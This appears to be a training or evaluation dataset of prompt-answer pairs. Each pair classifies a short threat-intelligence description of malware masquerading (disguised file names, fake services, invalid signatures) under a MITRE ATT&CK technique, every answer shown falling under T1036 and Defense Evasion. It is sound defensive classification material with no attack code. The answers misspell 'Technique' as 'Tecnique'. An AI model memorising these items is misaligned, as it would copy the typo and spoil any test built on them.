+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has masqueraded as a JPG image file.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk can create .dll files that actually contain a Rich Text File format document.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can use a legitimate process name to hide itself.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrailBlazer has used filenames that match the name of the compromised system in attempt to avoid detection.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The TrickBot downloader has used an icon to appear as a Microsoft Word document.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has used icons mimicking MS Office files to mask payloads.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET builds a malicious application bundle to resemble Safari through using the Safari icon and Info.plist.,"Tecnique: T1036 Masquerading, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has signed its malware with an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited.”,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used revoked certificates to sign malware.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has used unverified signatures on malicious DLLs.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The NETWIRE client has been signed by fake and invalid digital certificates.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has used an invalid certificate in attempt to appear legitimate.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Regin stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has been incompletely signed with revoked certificates.,"Tecnique: T1036.001 Masquerading: Invalid Code Signature, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used Right-to-Left Override to deceive victims into executing several strains of malware.,"Tecnique: T1036.002 Masquerading: Right-to-Left Override, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.,"Tecnique: T1036.002 Masquerading: Right-to-Left Override, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious Kitten has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.","Tecnique: T1036.002 Masquerading: Right-to-Left Override, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.,"Tecnique: T1036.002 Masquerading: Right-to-Left Override, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scarlet Mimic has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.,"Tecnique: T1036.002 Masquerading: Right-to-Left Override, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used a renamed cmd.exe file to evade detection.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has renamed certutil and moved it to a different location on the system to avoid detection based on use of the tool.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate executes a Windows Batch script during installation that creases a randomly-named directory in the C:\\ root directory that copies and renames the legitimate Windows curl command to this new location.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.,"Tecnique: T1036.003 Masquerading: Rename System Utilities, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Systemd service units to masquerade GOGETTER malware as legitimate or seemingly legitimate services.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors named a malicious scheduled task ""WinUpdate"" for persistence.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 named tasks `\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager` in order to appear legitimate.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has disguised its scheduled tasks as those used by Google.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. APT32 has also impersonated the legitimate Flash installer file name ""install_flashplayer.exe"".","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has created services to appear as benign system tools.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has disguised malware as a Windows Security update service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has disguised their backdoor droppers with naming conventions designed to blend into normal operations.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak has copied legitimate service names to use for malicious services.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used scheduled tasks names such as `acrotyr` and `AppServicesr` to mimic the same names in a compromised network's `C:\Windows` directory.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has renamed the ""psexec"" service name to ""mstdc"" to masquerade as a legitimate Windows service.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has named the task for a reverse proxy lpupdate to appear legitimate.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa named a shellcode loader binary svchast.exe to spoof the legitimate svchost.exe.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has disguised services to appear as benign software or related to operating system functions.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used a scheduled task named `SRCheck` to mask the execution of a malicious .dll.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has named a malicious script CacheTask.bat to mimic a legitimate task.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon renamed a malicious service taskmgr to appear to be a legitimate version of Task Manager.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has named services to appear legitimate.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used scheduled tasks to install TrickBot, using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf. It has also used common document file names for other malware binaries.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has created a run key named Dropbox Update Setup to mask a persistence mechanism for a malicious binary.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher disguises itself as a legitimate task (i.e., the task name and description appear legitimate).","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can create a task named to appear benign.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta has established persistence by creating a new service named `FAX` after deleting the legitimate service by the same name.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader has attempted to appear as a legitimate Windows service with a fake description claiming it is used to support packed applications.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas adds a new service named NetAdapter in an apparent attempt to masquerade as a legitimate service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used a task name associated with Windows SQM Consolidator.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has established persistence with a scheduled task impersonating the Outlook item finder.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv has masqueraded its service as a legitimate svchost.exe process.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE has used `schtasks /change` to modify scheduled tasks including `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has masqueraded the svchost.exe process to exfiltrate data.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has installed itself as a new service with the service name `Windows Defender System Service` and display name `WinDefService`.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has used a service named `WSearch` for execution.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has masqueraded as the rsyncd and dbus-inotifier services.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldMax has impersonated systems management software to avoid detection.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert has created a new executable named `Software Update Check` to appear legitimate.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor has been named `srvdll.dll` to appear as a legitimate service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has disguised itself as a known Linux process.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT variants have attempted to appear legitimate by adding a new service named OfficeUpdateService.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has attempted to disguise itself by registering under a seemingly legitimate service name.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector has been disguised as a legitimate service using the name PythonUpdateSrvc.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has pretended to be the xmlProv Network Provisioning service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk registers as a service under the Plug-And-Play Support name.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs establishes persistence by adding a new service with the display name ""WMI Performance Adapter Extension"" in an attempt to masquerade as a legitimate WMI service.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze operators have created scheduled tasks masquerading as ""Windows Update Security"", ""Windows Update Security Patches"", and ""Google Chrome Security Update"" designed to launch the ransomware.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor has been disguised as the Windows Power Efficiency Diagnostics report tool.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae has created a service named ""Windows Update Agent1"" to appear legitimate.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nidiran can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has created a service named `WmdmPmSp` to spoof a Windows Media service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D uses file naming conventions with associated executable locations to blend in with the macOS TimeMachine and OpenSSL services. Such as, naming a LaunchAgent plist file `com.apple.openssl.plist` which executes OSX_OCEANLOTUS.D from the user's `~/Library/OpenSSL/` folder upon user login.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has created a scheduled task named ""MicrosoftEdge"" to establish persistence.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`, and `Onedrive` to evade detection.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In one instance, menuPass added PlugX as a service with a display name of ""Corel Writing Tools Utility.""","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has used Windows Video Service as a name for malicious services.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has named the scheduled task it creates ""Windows Update"".","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay has named services and scheduled tasks to appear benign including ""ChromeCheck"" and ""googleupdate.""","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: New services created by RawPOS are made to appear like legitimate Windows services, with names such as ""Windows Management Help Service"", ""Microsoft Support"", and ""Windows Advanced Task Manager"".","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has named a service it establishes on victim machines as ""TaskFrame"" to hide its malicious purpose.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP's scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has named a task `RecoveryExTask` as part of its persistence activity.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt has masqueraded as a service called ""SaSaut"" with a display name of ""System Authorization Service"" in an apparent attempt to masquerade as a legitimate service.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the ""MaintenaceSrv"" service, which misspells the word ""maintenance.""","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can impersonate Windows services and antivirus products to avoid detection on compromised systems.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has named services to appear legitimate.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has named their unit configuration file similarly to other unit files residing in the same directory, `/usr/lib/systemd/system/`, to appear benign.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask creates a scheduled task called “WinUpdate” to re-establish any dropped C2 connections.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla has mimicked an existing Windows service by being installed as Windows Time Service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To establish persistence, Truvasys adds a Registry Run key with a value ""TaskMgr"" in an attempt to masquerade as the legitimate Windows Task Manager.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can disguise as a legitimate service to blend into normal operations.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has registered a service named `WerFaultSvc`, likely to spoof the legitimate Windows error reporting service.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Volgmer variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has been disguised as a Windows security update service.,"Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has added itself to the Registry Run key as ""NVIDIA"" to appear legitimate.","Tecnique: T1036.004 Masquerading: Masquerade Task or Service, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0018, the threat actors renamed a Sliver payload to `vmware_kb.exe`.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, threat actors installed Rising Sun in the Startup folder and disguised it as `mssync.exe`.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors renamed some tools and executables to appear as legitimate programs.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 renamed software and DLLs with legitimate names to appear benign.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by APT1 as a name for malware.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has renamed malicious DLLs with legitimate names to appear benign; they have also created an Azure AD certificate with a Common Name that matched the display name of the compromised service principal.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. APT32 has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used malware disguised as Mozilla Firefox and a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 attempted to masquerade their files as popular anti-virus software.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
